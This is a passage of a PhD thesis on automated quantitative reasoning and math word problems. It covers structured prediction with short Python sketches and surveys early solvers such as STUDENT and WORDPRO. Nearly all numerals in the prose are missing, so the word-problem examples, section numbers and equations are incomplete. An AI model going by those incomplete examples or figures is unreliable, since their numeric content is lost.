I would like to thank Snigdha; her help was instrumental in finishing this thesis on time. I would also like to thank the past and present members of CogComp, namely Daniel, Stephen, Haoruo, Vinod, Rajhans, Kai-Wei, Gourab, Nitish, Colin, Shashank (Srivastava and Gupta), Michael, Christos, Parisa, Chen-Tse, Pavan, Yangqiu and Mark. They gifted me an ideal, stimulating environment for research. Also, special thanks to my friends Arka, Arun, Anish, Sangeetha and Mainak, who provided me a lot of support in troubled times. Finally, I would like to thank my family: my mom, dad and brother. My parents left no stone unturned to provide me the best quality education, in spite of facing many hardships themselves to make it possible. This thesis could not have been completed without my family's encouragement, support and love. I wish my mom were here today to see me graduate. Ma, words cannot describe how much I miss you.

Table of Contents

- List of Tables
- List of Figures
- Chapter 1: Introduction (Motivation; Math Word Problems: An Abstraction for Quantitative Reasoning; Challenges in Automated Quantitative Reasoning; Variability of Natural Language Text; Quantity Argument Detection; Reasoning about Multiple Quantities; Incorporating Domain Knowledge; Contributions of the Thesis; Overview of the Thesis)
- Chapter 2: Background (What is a Structure?; Structured Prediction; Inference in Structured Models; Learning Structured Prediction Models; Structural Support Vector Machines; Discussion and Special Case; Structured Prediction with Latent Variables)
- Chapter 3: Early Work in Quantitative Reasoning (Early Algebra and Arithmetic Solvers; STUDENT Program; Other Arithmetic Word Problem Solvers; Solvers for Other Domains; Recent Advances in Statistical Solvers)
- Chapter 4: Quantity Entailment (Introduction; Related Work; Representing Quantities; Extraction of Quantities; Features; Mapping Text Segments into QVR; Extraction of Units; Quantity Entailment; Reasoning Framework; Scope of QE Inference; Experimental Study; Datasets; Quantity Segmentation; Quantity Entailment; Currency Range Search; Qualitative Analysis; Conclusion)
- Chapter 5: Equation Parsing (Introduction; Related Work; The Equation Parsing Task; Equation Parse Representation; Projectivity; Predicting Equation Parse; Predicting Quantity Trigger List; Predicting Variable Trigger List; Predicting Equation Tree; Alternatives; Experimental Results; Dataset; Equation Parsing Modules; Equation Parsing Results; Error Analysis; Conclusion)
- Chapter 6: Arithmetic Word Problems (Introduction; Related Work; Expression Tree and Problem Decomposition; Mapping Problems to Expression Trees; Global Inference for Expression Trees; Quantity Schema; Relevance Classifier; LCA Operation Classifier; Experimental Results; Datasets; Relevance Classifier; LCA Operation Classifier; Global Inference Module; Discussion; Conclusion)
- Chapter 7: Unit Dependency Graphs (Introduction; Unit Dependency Graph; Learning to Predict UDGs; Vertex Classifier; Edge Classifier; Constrained Inference; Joint Inference with an Arithmetic Solver; Monotonic Expression Tree; Arithmetic Word Problem Solver; Joint Inference; Consistent Rate Unit Graphs; Experiments; Dataset; Data Acquisition; UDG Prediction; Solving Arithmetic Word Problems; Discussion; Conclusion)
- Chapter 8: Mapping to Declarative Knowledge (Introduction; Knowledge Representation; Transfer; Dimensional Analysis; Explicit Math; Part-Whole Relation; Mapping of Word Problems to Declarative Knowledge; Scoring Answer Derivations; Learning; Inference; Model and Implementation Details; Supervision; Features; Experiments; Results on Existing Dataset; New Dataset Creation; Generalization from Biased Dataset; Results on the New Dataset; Analysis; Related Work; Conclusion)
- Chapter 9: Conclusion and Future Work (Summary; Limitations; Future Directions; Commonsense Quantitative Reasoning; Unified Framework for Solvers; Automated Math Tutoring System)
- References
- Appendix A: Lexicon for Equation Parsing
- Appendix B: Declarative Rules for Arithmetic Word Problems

List of Tables

- Schemas used in WORDPRO.
- Cross-validation results of segmentation accuracy and time required for segmentation; the runtime columns have been normalized and expressed as ratios.
- Results of QE; adding semantics (+SEM) consistently improves performance; only a small fraction of entailing quantities can be recovered by simple string matching.
- Micro-averaged accuracy in detecting monetary mentions.
- Input and output for equation parsing.
- Summary of notations used in this chapter.
- Statistics of dataset.
- Performance of quantity trigger list prediction.
- Performance of variable trigger list prediction.
- Performance of equation tree prediction.
- Performance on equation parsing.
- Performance of LCA operation classifier on the datasets AI2, IL and CC.
- Performance of relevance classifier on the datasets AI2 and IL.
- Accuracy in correctly solving arithmetic problems. The first four rows represent various configurations of our system. We achieve state-of-the-art results on both the AI2 and IL datasets.
- Units of rate quantities.
- Performance of system components for predicting vertex and edge labels for unit dependency graphs.
- Performance in predicting UDGs.
- Performance in solving arithmetic word problems.
- Examples of problems which UnitDep gets correct, but LCA++ does not.
- Two examples of arithmetic word problems, and derivation of the answer. For each combination, first a knowledge type is chosen, and then a declarative rule from that knowledge type is chosen to infer the operation.
- Accuracy in solving arithmetic word problems. All columns except the last report cross-validation results. ∗ indicates statistically significant improvement over the second-highest score in the column.
- Pairs of perturbed problems, along with the systems which get them correct.
- Examples which Knowledge gets correct, but UnitDep does not.
- Examples of errors made by Knowledge.

List of Figures

- A sentence with its trigger list and equation tree. −r indicates subtraction with order RL.
- An arithmetic word problem, solution expression and the corresponding expression tree.
- Two different expression trees for a numeric expression; the right one is monotonic, whereas the left one is not.
- An arithmetic word problem, its UDG, and a tree representation of the solution expression. Several dependencies exist between the UDG and the final solution of a problem: two quantities connected by a SAME UNIT edge can be added or subtracted, and a quantity connected by a DEN UNIT edge to the question indicates that some expression will be divided by it to get the answer's unit.
. an example arithmetic word problem and its solution, along with the type of domain knowledge required to generate each operation of the solution
. annotations in our dataset; number list refers to the numbers detected in the problem; the subscripts in the solution indicate the position of the numbers in the number list

chapter  introduction

. motivation

numbers are an integral part of natural language. we use numbers extensively to communicate how hot the weather is, how well our favorite team played in the last game, etc. newspaper articles regularly report statistics to present an objective assessment of a situation, ranging from the number of people killed in a bomb blast, to the amount of money embezzled by a politician. to understand such articles, one often needs to figure out several properties of the numbers used in them, and how these numbers interact with the rest of the story. consider the following sentence taken from a news article in the chicago tribune [chi, ]:

emanuel spent $ . million from july until the feb. election and spent an additional $ . million in the following five weeks.

in order to understand the sentence, one has to understand the following for each numeric mention:

. unit: indicates which object is being referred to. one has to understand which numbers indicate monetary amounts, and which ones indicate date and time, etc.

. associated verb: indicates the effect of the number on the world, whether it is indicating the state of an economy, or the amount of money in a transaction, etc. in this case, both " . million" and " . million" have the verb "spend" associated with them, indicating that both are expenditures made by the campaign.

. arguments: indicates the entities interacting with the number. for example, for a monetary transaction, you want to know the recipient and the donor. in the example above, knowing that both " . million" and " . million" are expenditures made by emanuel enables the reader to understand that, in total, emanuel spent . million dollars.

there is also a need to understand interactions among several numbers mentioned across several sentences in text. consider the following excerpt from a recent news article [syr, ]:

local sources told the new arab that a car bomb had targeted a free syria army checkpoint at the refugee camp on the syrian border with jordan, killing two fsa fighters and injuring several others ... jordanian border police responded by opening fire on the attacking vehicle, killing a child, according to the sources. a car bomb in january killed at least seven people at the same camp. around , people live in the rukban camp ... an earlier car bomb attack near the camp, in the hinterland border area on june last year, resulted in the deaths of six jordanian military personnel.

in order to report the total number of deaths reported in the article, one has to analyze how the different numbers in the story interact. one has to understand that the number of people living in the camp (" , ") is irrelevant for calculating the number of casualties. all numbers stating the number of victims need to be identified from all sentences in the article, like "two fsa fighters", "a child", "at least seven people", etc. finally, all such numbers need to be summed up. all these challenges come under the umbrella of quantitative reasoning.
in spite of the difficulties involved, human beings are adept at performing quantitative reasoning to understand natural language text. however, this is not true for automated language understanding systems. relatively little work in natural language processing has analyzed the use of quantities in text. even in areas where we have relatively mature solutions, like information retrieval, we fail to deal with quantities; for example, one cannot search the financial media for "transactions in the - million pounds range."

in this dissertation, we investigate the challenges in performing automated quantitative reasoning. we formulate several tasks that we believe to be fundamental to addressing these challenges, and address the problem of developing robust natural language understanding methods for these tasks, using statistical machine learning.

. math word problems: an abstraction for quantitative reasoning

in this thesis, we suggest that the vast majority of quantitative reasoning problems that occur frequently in text can be viewed as math word problems of the kind solved by elementary and middle school kids. let's look at a simple math word problem which students solve in elementary school.

ryan has  marbles and  blocks. if he shares the marbles among  friends, how many marbles does each friend get?

even in such a simple quantitative reasoning problem, there are several challenges involving multiple interactions among the numbers in the text. one needs to understand that the question asks for the "marbles" each "friend" gets, so the number of "blocks" should have no effect on the answer. one needs to understand the impact of the associated verb "shares", and that division is needed to calculate the correct answer. note that this bears a clear resemblance to the challenges of quantitative reasoning discussed earlier.

there are also several advantages in focusing on math word problems. the language in these problems is relatively simple, and requires understanding of a few related concepts. this helps us to focus on quantitative reasoning, without addressing overly complicated nlp issues. these problems are readily available from textbooks and tutoring websites; as a result, developing benchmark datasets is relatively easy. several pieces of work described in this thesis, particularly in the later chapters (chapter , and ), have been evaluated on the ability to automatically solve math word problems. however, the solutions are applicable to general quantitative reasoning problems.

. challenges in automated quantitative reasoning

building automated systems for quantitative reasoning involves developing an information extraction system which detects key properties of a quantity, as well as developing a reasoning system which captures the interaction of several numbers in text. developing such a system is challenging for several reasons, which we explain and illustrate in the following subsections.

. . variability of natural language text

an initial step in performing quantitative reasoning is to identify quantities mentioned in natural language text, to understand what they mean and what they refer to. we address this by identifying the quantity and its unit, and representing them in a canonical form. this step is challenging because the same quantity can be expressed in several forms, a problem we refer to as variability. for example, the quantity "$ . million" can be written as "usd . million", " dollars", " $".
in addition, the same amount of money can be expressed in some other currency unit (like euros). this will require some unit conversion to understand that it refers to the same amount of money. another challenge is the effect of several modifiers on quantities. consider the difference between “more than hours”, “ hours”, and “around hours”. although all three phrases are similar in terms of lexical overlap, they represent different quantity values. in order to capture the difficulties in detecting and normalizing numbers, and their impact on quantitative reasoning, we formulate a new task called quantity entailment (qe). this task draws its motivation from the general recognizing textual entailment (rte) problem [dagan et al., ]. given two sentences t and h, the task of qe is to determine whether a given quantity in h can be inferred from a given text snippet t . an example is shown below. t : a bomb in a hebrew university cafeteria killed five americans and four israelis. h: a bombing at hebrew university in jerusalem killed nine people, including five americans. for this example, the output of qe is that the phrase “nine people” can be implied by the phrase “fives americans and four israelis”. we investigate this task in chapter , and discuss effective solutions to quantity detection and normalization, and ultimately show its effectiveness in determining quantity entailment. . . quantity argument detection to reason with respect to numbers, it is important to extract all information related to it from the sentence. for example, if a number is indicating a transaction, one needs to know the donor and the recipient; if a number represents a relation between two entities, one needs to know what those entities are. consider the following example: emanuel’s campaign contributions total thrice those of his opponents put together. to understand the sentence above, its important to know that “thrice” denotes a relation between “emanuel’s campaign contributions” and “the contributions of his opponents”. often, not all the entities associated with a relation are explicitly mentioned in the sentence; they have to be inferred from the context. consider the following sentence [gun, ]. on an average day this year, americans were killed by guns. here, one needs to use the understanding of “average”, and infer that the relation that is described involves the number of gun violence deaths each day of the year. in order to capture these challenges, we formulate the task of equation parsing. the task takes as input a sentence representing a mathematical relation among at most two entities. the output of equation parsing is an equation which represents the relation expressed in the sentence. in addition to the equation, the output also provides a grounding for the variables in the equation, that is, it provides a mapping of the variables in the equation to text snippets indicating what the variables stand for. we discuss this problem in chapter . . . reasoning about multiple quantities reasoning over multiple quantities often require correct hierarchical composition of numbers with mathe- matical operations, as in the case of the following math word problem: isabel picked flowers for her friends wedding. she was making bouquets with flowers in each one. if of the flowers wilted before the wedding, how many bouquets could she still make? in order to answer this question, needs to be subtracted from , and only then the result needs to be divided by . 
first, we have to decide the order in which the numbers need to be composed, and second, we have to decide the math operation for each combination. this kind of hierarchical composition poses a challenge for quantitative reasoning. to address this, we introduce novel decomposition strategies in chapters and . our decomposition strategies allow reducing a math word problem with any number of quantities, into simple quantitative reasoning problems over at most two quantities each. we utilize this decomposition to develop a system for automatically solving math word problems like the example above, and achieve state of the art results. . . incorporating domain knowledge domain knowledge often significantly influences the outcome of quantitative reasoning. a key reason humans do very well in quantitative reasoning is that they can easily use their understanding of the world and background knowledge to make inferences. for example, in the math word problem in subsection . . , a child can easily infer that “wilt” should result in subtraction, since no one uses wilted flowers in bouquets. also, since the unit of “ ” is “flowers per bouquet”, it should be used in a division operation. indeed, understanding of verb interaction and rate relationships seem essential to solving the problem. all these indicate that there is a need to effectively integrate domain knowledge into any quantitative reasoning system, which will be the focus of the last part of the thesis. . contributions of the thesis in this thesis, we investigate each of the challenges mentioned above, for automated quantitative reasoning. in particular, we make the following claim: current nlp pipeline is not sufficient to extract an abstraction of text required to perform quantitative reasoning. however quantitative reasoning over text can be facilitated by identifying quantities, units, and integrating domain knowledge about mathematical relations into machine learning methods. to perform quantitative reasoning over multiple quantities, we can decompose the problem into simpler components, where each component is a simpler quantitative reasoning problem over at most two quantities. the primary contributions of the thesis are summarized below: . we propose a statistical approach to quantity detection and normalization based on numbers, units and modifiers. we show that this is an effective approach to support simple quantitative reasoning. . we exemplify the drawbacks of current syntactic and semantic parsers to extract the abstraction need to support quantitative reasoning. . we exploit natural properties of equations to reduce search space, and propose a pipeline architecture to efficiently and effectively predict mathematical relations expressed in a single sentence. . we propose a novel decomposition procedure to support quantitative reasoning over multiple mentions of numbers. we show that this decomposition allows simple reasoning over pairs of quantities to be composed effectively, to perform quantitative reasoning over multiple numbers across several sentences. . we introduce a structure called “unit dependency graphs” to represent the relationships between the units of various numbers in text, and the question you need to answer using that text. we show that unit dependency graphs capture the domain knowledge about unit compatibility and dimensional analysis, and can be effectively used to incorporate such domain knowledge in quantitative reasoning systems. . 
we propose a framework to integrate any form of declarative knowledge into word problem solving. we show that this declarative knowledge based method learns better models from limited data, as well as, obtains the right abstraction even in the presence of biased data. . overview of the thesis this section provides a guide for the rest of the thesis. the thesis can be broadly categorized into four logical segments. part i: background the first part of this thesis surveys background work in the areas of quantitative reasoning, structured learning and inference. these chapters do not provide exhaustive surveys of these research directions and we will only go over relevant material here and include additional pointers as necessary. a reader familiar with machine learning and structured learning paradigms, can only skim these parts, and focus only on the background work in quantitative reasoning. chapter is devoted to this part. part ii: quantity extraction, normalization and equation parsing this part of the thesis discusses work related to quantities at a mention level or sentence level. we discuss effective approaches to extract and normalize quantities into a standard form. we also show how we can leverage certain natural properties of a sentence to extract mathematical relations between entities in the sentence. the part constitutes two chapters. • chapter discusses our approach to quantity extraction and normalization, and its application to textual entailment problems. • chapter describes methods to analyze mathematical relations described within a single sentence, as well as, extract the relevant entities for the relation. part iii: solving arithmetic word problems this part focuses on quantitative reasoning problems which span across multiple sentences. we found that math word problems form a natural abstraction to the challenges we usually encounter in across sentence quantitative reasoning. as a result, this part will focus on building robust solvers for math word problems. we however do not look at the entire range of word problems, which might require a wide range of background knowledge. we restrict our focus to arithmetic word problems; these are story problems which students solve in elementary school. the answers to these problems can be usually found by combining the numbers in the problem text by simple basic operations. this part constitutes three chapters: • chapter describes a decomposition strategy which is key in applying quantitative reasoning over multiple numbers mentioned across several sentences. we show how this decomposition can be used to develop an end to end arithmetic word problem solver. • chapter introduces a structure called “unit dependency graphs” to capture the relations among the units of different numbers mentioned in text. we show how these graphs can be used to incorporate do- main knowledge about rate relationships, unit compatibility and dimensional analysis to word problem solving and to general quantitative reasoning. • chapter describes a framework to integrate any form of declarative knowledge into a word problem solver. we use the framework to integrate four common forms of domain knowledge for arithmetic word problems. we show that the declarative knowledge helps our system learn more effectively in the presence of limited data. part iv: conclusion the final part of the thesis offers concluding remarks. it summarizes the contributions of this dissertation and identifies directions for future research that can be built on top of this work. 
this can be found in chapter .

chapter  background

statistical machine learning approaches are widely used in many areas of natural language processing, in particular in predicting semantic annotations and linguistic structures. in this chapter, we cover a few basic machine learning concepts which will be used in the rest of the thesis. we mainly focus on structured prediction, since this is the paradigm most widely used in this thesis. we introduce the problem of structured prediction via the example of part-of-speech tagging, and outline common approaches to solve this problem.

. what is a structure?

the concept of a structure is an important one in computational linguistics and machine learning. burton-roberts ( ) informally defines a structure as a complex object that is divisible into component parts, each of which can belong to different categories, have specific functions in the complete object, and are arranged in a specifiable way. we will use the task of part-of-speech tagging as a running example in this section, with the following sentence as an illustrative example:

i have twenty dollars in my pocket.

the goal of part-of-speech tagging is to label each word in the sentence with one of the part-of-speech tags. any valid output for the sentence above is a set of part-of-speech tags, one for each word in the sentence. this set of part-of-speech tags can be referred to as a structure.

. structured prediction

let us now formulate the part-of-speech tagging problem as a structured prediction problem. we denote the input sentence as x, and the output structure as y. the output structure y can be decomposed into a set of m variables y_1, y_2, ..., y_m, where m is the number of words in the input sentence x. each variable y_i denotes the part-of-speech tag for the i-th word of the input sentence x; therefore, each y_i can be assigned one of the part-of-speech tags. finally, we define the input space X as the space of all possible inputs to a problem; here, it denotes the space of all sentences. we also define the output space Y as the space of all possible outputs; in our example, this denotes the set of all sequences of part-of-speech tags.

the structured prediction problem is to learn a mapping function f(x; w) from the input space X to the output space Y. this mapping function is parameterized with weights w over task-relevant features φ(x, y). note that the feature function is defined over both the input x and the entire output structure y. this definition of a feature function allows us to design features that express dependencies among the local output variables. in general, designing feature templates requires domain knowledge. for example, in our running example, it is common to use words in x conjoined with the corresponding part-of-speech tag in y as features.

we use the weight vector w and the feature function φ(x, y) to define a scoring function for output structures. it often takes the following linear form:

$$ s(y; w, x) = w^T \phi(x, y) $$

we want this scoring function to assign a higher score to the correct output structure, and a lower score to all other structures.
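to make the formulation concrete, the following is a minimal sketch of such a linear scoring function for part-of-speech tagging. it is only an illustration, not the implementation used in this thesis: the feature templates (word conjoined with its tag, plus adjacent tag pairs), the tag names, and the toy weights are all assumptions made for the example.

```python
# illustrative sketch of a linear scoring function s(y; w, x) = w . phi(x, y)
# for part-of-speech tagging; feature templates and weights are assumptions.
from collections import Counter
from typing import Dict, List, Tuple


def phi(x: List[str], y: List[str]) -> Counter:
    """feature function: emission features (word ^ tag) and
    transition features (previous tag ^ tag)."""
    feats = Counter()
    prev = "<START>"
    for word, tag in zip(x, y):
        feats[("emit", word, tag)] += 1
        feats[("trans", prev, tag)] += 1
        prev = tag
    return feats


def score(w: Dict[Tuple, float], x: List[str], y: List[str]) -> float:
    """linear score w^T phi(x, y)."""
    return sum(w.get(f, 0.0) * v for f, v in phi(x, y).items())


if __name__ == "__main__":
    x = "i have twenty dollars in my pocket".split()
    y_good = ["PRP", "VBP", "CD", "NNS", "IN", "PRP$", "NN"]
    y_bad = ["NN"] * len(x)
    # a toy weight vector that happens to prefer the correct tagging
    w = {("emit", "dollars", "NNS"): 2.0, ("emit", "i", "PRP"): 1.5,
         ("trans", "CD", "NNS"): 1.0, ("emit", "dollars", "NN"): -0.5}
    print(score(w, x, y_good), ">", score(w, x, y_bad))
```

a learned weight vector would play the role of the hand-set toy weights above; the next section discusses how to search over output structures with such a scoring function.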
. inference in structured models

suppose we have a weight vector w such that the scoring function s(y; w, x) scores the correct output structure higher than all other structures. how will we use such a scoring function to predict an output structure for an input x? this involves searching for the best structure according to the scoring function; this is referred to as the inference problem in structured prediction. mathematically, this is seen as computing the following:

$$ y^* = \arg\max_{y \in Y} \; w^T \phi(x, y) $$

where Y is the space of feasible output structures. note that the part of Y we need to search over is usually very large. consider the case of our part-of-speech tagging example: for an input sentence of m words, the number of possible tag sequences is ( )^m, since each word can have one of the  tags. as a result, naively enumerating all output sequences and checking their scores is not a feasible solution.

there are three options to solve the inference problem in a reasonably efficient way. first, we can transform the problem to an integer linear program (ilp), and then use an off-the-shelf ilp solver to solve the problem. this can still become intractable if the ilp contains a lot of variables. another option is to make independence assumptions between different parts of the output structure. an example of this in our tagging task is to assume that the part of speech of the i-th word depends only on the i-th word and the part-of-speech tag of the (i−1)-th word. these assumptions are often valid for the problem, and lead to efficient inference algorithms. however, for the problems we address in this thesis, independence assumptions usually do not hold. hence, we opt for the third option, which is to perform approximate inference using beam search.

the main idea behind beam search is to enumerate all possible assignments to the first output variable, and score them. we keep only the top k assignments and discard the rest. next, for each retained assignment of the first variable, we enumerate all possible assignments for the second output variable, again keep the k highest scoring partial assignments and discard the rest, and so on. here k is often referred to as the beam size. let's see how we can perform beam search for the part-of-speech tagging example. we assign y_1 (the output variable for the first word) all the tags, and score each assignment. scores of these partial assignments can be computed using only the features that depend on y_1. we keep the top k, move on to y_2, and so on. although beam search is an approximate procedure, in practice it is very effective. also, the beam size is a parameter, which can be chosen to be a small value if the output space for the problem is very large.
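the sketch below illustrates this beam-search procedure for the tagging example. it is self-contained and deliberately tiny: the tag set, the partial-scoring scheme, and the beam size are assumptions for the illustration, not the inference code used later in the thesis.

```python
# illustrative beam-search inference for sequence tagging; a sketch only.
# partial hypotheses are scored with simple emission/transition weights.
from typing import Dict, List, Tuple

TAGS = ["NN", "VB", "PRP", "CD", "IN"]          # assumed toy tag set


def partial_score(w: Dict[Tuple, float], word: str, tag: str, prev: str) -> float:
    """score contribution of extending a hypothesis with (word, tag)."""
    return w.get(("emit", word, tag), 0.0) + w.get(("trans", prev, tag), 0.0)


def beam_search(w: Dict[Tuple, float], x: List[str], k: int = 3) -> List[str]:
    """keep the k best partial tag sequences after each word."""
    beam: List[Tuple[float, List[str]]] = [(0.0, [])]
    for word in x:
        candidates = []
        for score_so_far, tags in beam:
            prev = tags[-1] if tags else "<START>"
            for tag in TAGS:
                candidates.append(
                    (score_so_far + partial_score(w, word, tag, prev), tags + [tag])
                )
        # prune: keep only the k highest scoring partial assignments
        beam = sorted(candidates, key=lambda c: c[0], reverse=True)[:k]
    return max(beam, key=lambda c: c[0])[1]


if __name__ == "__main__":
    w = {("emit", "i", "PRP"): 1.0, ("emit", "have", "VB"): 1.0,
         ("emit", "twenty", "CD"): 1.0, ("trans", "CD", "NN"): 0.5,
         ("emit", "dollars", "NN"): 1.0}
    print(beam_search(w, "i have twenty dollars".split(), k=3))
```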
. learning structured prediction models

finally, we discuss how to obtain a good scoring function for output structures. for this problem, assume we have access to a set of n labeled training examples $D = \{(x_i, y_i)\}_{i=1}^{n}$. the learning problem is to find a weight vector w such that it scores the target output structure higher than other structures. this means that we want the value of $w^T \phi(x_i, y_i)$ to be higher than $w^T \phi(x_i, y)$, where y is any other feasible output structure. there are several learning algorithms which can be used to obtain such a weight vector. in this thesis, we mostly use structural support vector machines; we introduce them in the following subsection.

. . structural support vector machines

structured svms are a generalization of the binary svm algorithm [cortes and vapnik, ] to structured outputs [tsochantaridis et al., ]. the goal of the learning is to solve the following optimization problem:

$$ \min_{w} \; w^T w + C \sum_i L(x_i, y_i, w) $$

where $L(x_i, y_i, w)$ is the loss function for the structured prediction. the loss function is written as

$$ L(x_i, y_i, w) = \ell\Big( \max_{y \in Y} \; \Delta(y_i, y) - w^T \phi(x_i, y_i) + w^T \phi(x_i, y) \Big) $$

here ∆ signifies the dissimilarity of the structure y with respect to the annotated structure y_i. the function ℓ(·) can be instantiated by loss functions like the hinge loss, with ℓ(x) = max(0, x). different algorithms have been proposed in the literature to solve the optimization problem [joachims et al., , shalev-shwartz et al., , chang et al., ]. in this thesis, we use the illinois-sl package [chang et al., ] with the dual-coordinate descent based algorithms.

. discussion and special case

for learning and inference with structured models, we need to specify the following:

. the feature representation for a structure y for an input x, denoted as φ(x, y).
. an inference algorithm that finds the best structure for an input x using a weight vector w.
. a learning algorithm.

note that both binary and multiclass classification problems are special cases of structured prediction. as a result, a structured predictor can be used for binary and multiclass classification. here we describe how we can convert a multiclass classification problem to a structured problem. let us assume a multiclass classification problem with k classes. usually, feature functions for multiclass problems are defined only on the input x; let us denote them as φ(x). to convert this to a structured problem, we consider the output space Y to be the set of class labels. we also define the feature function φ(x, y) to be the set of features φ(x) conjoined with the label y. with these definitions, we can now use the standard structured learning algorithm to do multiclass classification. in this thesis, we follow this procedure to perform multiclass classification with illinois-sl.
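before moving on to latent variables, the following sketch illustrates the structured hinge loss defined in the structural svm subsection above, computed for one training example by brute-force enumeration of a tiny output space. the enumeration is only workable for toy problems, and every name in it is an assumption for the example; real packages such as illinois-sl rely on inference rather than enumeration.

```python
# illustrative computation of the structured hinge loss
#   L(x_i, y_i, w) = max(0, max_y [Delta(y_i, y) + w.phi(x_i, y)] - w.phi(x_i, y_i))
# by brute-force enumeration of a tiny tag space; a sketch only.
from itertools import product
from typing import Dict, List, Tuple

TAGS = ["NN", "VB", "PRP"]                      # assumed toy tag set


def phi(x: List[str], y: List[str]) -> Dict[Tuple, float]:
    feats: Dict[Tuple, float] = {}
    for word, tag in zip(x, y):
        feats[("emit", word, tag)] = feats.get(("emit", word, tag), 0.0) + 1.0
    return feats


def dot(w: Dict[Tuple, float], feats: Dict[Tuple, float]) -> float:
    return sum(w.get(f, 0.0) * v for f, v in feats.items())


def hamming(y_gold: List[str], y: List[str]) -> float:
    """Delta: number of positions where the tags disagree."""
    return sum(a != b for a, b in zip(y_gold, y))


def structured_hinge(w, x, y_gold):
    gold_score = dot(w, phi(x, y_gold))
    worst = max(
        hamming(y_gold, list(y)) + dot(w, phi(x, list(y)))
        for y in product(TAGS, repeat=len(x))
    )
    return max(0.0, worst - gold_score)


if __name__ == "__main__":
    w = {("emit", "i", "PRP"): 2.0, ("emit", "run", "VB"): 2.0}
    # 0.0 when w separates the gold tagging from all others with enough margin
    print(structured_hinge(w, ["i", "run"], ["PRP", "VB"]))
```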
. structured prediction with latent variables

until now, our structured prediction framework has only two types of variables: input variables x and output variables y. both these variables are observed, that is, they are available as part of our training data. however, oftentimes important modeling information is not provided as part of the training data. for example, for the task of machine translation from english to french, training data comprises english sentences paired with corresponding translated french sentences. there are several intermediate variables which allow the translation of an english sentence to french, like the ones indicating word-level or phrase-level alignments. however, these alignment variables are not provided as part of the training data. even though these variables are not provided, it is important to model them in order to capture the process of translation. in such cases, they are modeled as latent variables h ∈ H, where H is the set of feasible assignments to the hidden variables.

in order to extend the structured prediction formulation to the case of hidden variables, we redefine the feature function to also use the hidden variables (written as φ(x, h, y)). the inference problem is now to compute

$$ (h^*, y^*) = \arg\max_{(h, y) \in H \times Y} \; w^T \phi(x, h, y) $$

this part remains similar to the earlier case; we simply have to think of the output structure as a tuple comprising both the output and hidden variables. for learning, we again assume access to n labeled examples $D = \{(x_i, y_i)\}_{i=1}^{n}$. the learning problem is to find a weight vector w such that it scores the target output structure higher than other structures. the score of a structure y is now given as follows:

$$ \max_{h \in H} \; w^T \phi(x, h, y) $$

in this thesis, we mostly use structural svm with latent variables [yu and joachims, ]. this involves solving the following optimization problem:

$$ \min_{w} \left[ w^T w + C \sum_i \max_{(\hat{h}, \hat{y}) \in H \times Y} \big[ w^T \phi(x_i, \hat{h}, \hat{y}) + \Delta(y_i, \hat{h}, \hat{y}) \big] \right] - \left[ C \sum_i \max_{h \in H} w^T \phi(x_i, h, y_i) \right] $$

where ∆(·) is again a loss function indicating the dissimilarity between ŷ and y_i. see [yu and joachims, ] for details of the algorithm to solve the above optimization.

chapter  early work in quantitative reasoning

work on quantitative reasoning problems in nlp dates back to the  's. over the years, several efforts have been made to automatically solve different types of quantitative problems described in natural language text. most of these systems were essentially rule based, and imposed strong restrictions on the input text. only recently have statistical methods been used in this context, with the focus on achieving robustness in handling a wide range of natural language text. in this chapter, we give an overview of these early systems, starting from the  's to the present day.

. early algebra and arithmetic solvers

several efforts were made to automatically solve arithmetic and algebra word problems. we describe a few of them in the following subsections.

. . student program

the student program written by [bobrow, ] is the first system that tried to solve algebraic problems stated in natural language. it accepts inputs in a restricted subset of english and tries to solve the algebraic problem expressed in it. an example input to the student system is:

if the number of customer tom gets is twice the square of % of the number of advertisement he runs, and the number of advertisements he runs is , what is the number of customer tom gets ?

the system parses individual sentences to extract mathematical relations among variables. it identifies variables by several keywords, and considers the words around these keywords as identifiers for the variables. for example, "the number of customer tom gets" is a variable where the keyword is "number". it cannot handle coreference, hence multiple usages of the same variable require the exact same phrase to be mentioned. in the above example, both the variable phrases "the number of customer tom gets" and "the number of advertisements he runs" are repeated verbatim when the same variable is used again. applying a set of rules recursively, complex sentence constructs are simplified into simpler forms free of conjunctions. certain substitutions (e.g., " times" for "twice") and truncations (e.g., "square of" to "square") are done until only the phrases representing variables remain, and these are related with basic operators (like plus, times, percent, etc.) to form a set of equations representing the problem. after such transformation, the above problem becomes:

(equal x (number of customer tom gets))
(equal (number of advertisements he runs) )
(equal (number of customers tom gets)
       (times (expt (times . (number of advertisements he runs)) )))

finally, standard techniques for solving systems of equations are used to get the answer.

. . other arithmetic word problem solvers

another system called wordpro was developed by [fletcher, ] for solving arithmetic word problems. wordpro was the first to introduce the concept of a set "schema" [marshall, ] as the basis for constructing the problem model. schemas can be thought of as categories for the arithmetic word problem; each schema also has several attributes associated with it.
for example, a "change" schema represents a relation amongst a start-set ("joe had marbles"), transfer-set ("then tom gave him marbles") and result-set ("how many marbles does joe have now?"). table . lists the instantiations of three "schemas" used in wordpro. they also used a categorization of these schemas based on which component of the schema the question is asking about. the program solves a problem guided by a list of rules which are applied sequentially. a drawback of wordpro was that it did not accept natural language text as input; it assumes that the input problem has already been mapped to a set of propositions.

two other programs, namely chips [diane j. briars, ] and arithpro [dellarosa, ], could also solve one-step arithmetic word problems with only one possible operation (addition/subtraction). both chips and arithpro categorize simple word problems into the same three categories: compare, combine and change. but for both these models rigid limitations were imposed on the change verb (only "to give") and on the order of the problem sentences (the first sentence of the problem must describe the number of objects the owner had to begin with, whereas the second sentence must contain the verb "gave").

table . : schemas used in wordpro

schema    instantiation
change    john has  apples. then he gave  apples to susan. how many apples does fred have now?
combine   adam has  apples. sarah has  apples. how many apples do they have altogether?
compare   dennis has  apples. fred has  apples. how many apples does fred have less than dennis?

[bakman, ] developed a more advanced arithmetic problem solver called robust, that could understand multi-step arithmetic word problems, and that too with extraneous information. an example of a problem handled by robust is as follows:

ruth had  nuts more than dan had. ruth gave dan  nuts. dan gave  nuts to david. now dan has  nuts and david has  nuts. how many nuts does ruth have now ?

the concept of "schema" as used in the earlier works is adopted with further expansion of "change" schemas into six distinct categories as against only two used earlier. this fine-grained categorization for change helped them to detect irrelevant numbers in the problem. the robust simulation works by first parsing the problem text to split all sentences into propositions or simple sentences like "ruth had nuts more than dan had", "ruth has ? nuts", etc. for the above problem. the propositions having complex change verbs like "give" are further split into elementary ones (like "ruth gave dan nuts" is split into "ruth forfeited nuts" and "dan got nuts"). then the change schema relations are applied to the elementary propositions by substituting the constant values for the corresponding variables. although it handles irrelevant numbers, robust still restricts the operations to be addition and subtraction.

